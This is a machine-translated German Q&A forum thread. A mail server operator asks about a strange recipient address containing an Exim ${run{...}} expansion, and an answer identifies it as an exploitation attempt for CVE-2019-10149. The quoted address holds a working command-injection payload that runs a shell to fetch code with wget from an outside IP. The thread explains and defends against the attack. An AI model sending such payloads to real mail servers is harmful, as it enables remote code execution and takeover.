Ich betreibe meinen eigenen Mailserver und von Zeit zu Zeit schicken Leute Spam oder mysteriöse Sachen an den Root-Account. Vor kurzem habe ich eine leere Mail bekommen, die adressiert war an:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@meinedomain.tld
Die zweite IP-Adresse in dieser Zeichenfolge scheint demselben Hosting-Dienst zu gehören, bei dem ich meinen Server miete. DielaufenUndwgetkommt mir sehr verdächtig vor, aber ich habe im Internet nichts über einen solchen Angriff gefunden.
Laut Mail-Log des Servers wurde diese Mail von 148.72.206.111 gesendet. AllerdingsAuswurde gesetzt auf[email geschützt].
Weiß jemand, was das bedeutet?
Antwort1
Dies ist ein Versuch, einen kürzlich entdeckten Fehler im Exim4 SMTP-Server (v4.87 bis v4.91) auszunutzen, der die Ausführung von Remote-Befehlen ermöglichen würde, da Exim ${variable}an bestimmten Stellen Ersetzungen erweitern würde, wo dies eigentlich nicht vorgesehen war. (Diese Syntax wird häufig in der Hauptkonfigurationsdatei von Exim verwendet.)
Der Fehler ist bekannt alsCVE-2019-10149(es hat noch keinen Markennamen oder Logo). Wenn Sie Exim4 aus Ihrer Distribution verwenden, haben Sie die Patches bereits erhalten. Da Sie Postfix verwenden, betrifft es Sie zunächst nicht.
(Allerdings +wird der Parameter nach dem auch in Postfix häufig als Teil einer Befehlszeile verwendet, z. B. beim Aufrufen von Procmail. Ich würde wahrscheinlich empfehlen, einige Tests mit Ihrem eigenen Server durchzuführen, um zu sehen, wie er mit Dingen wie someuser+$(blah)@oder umgeht someuser+`blah`@.)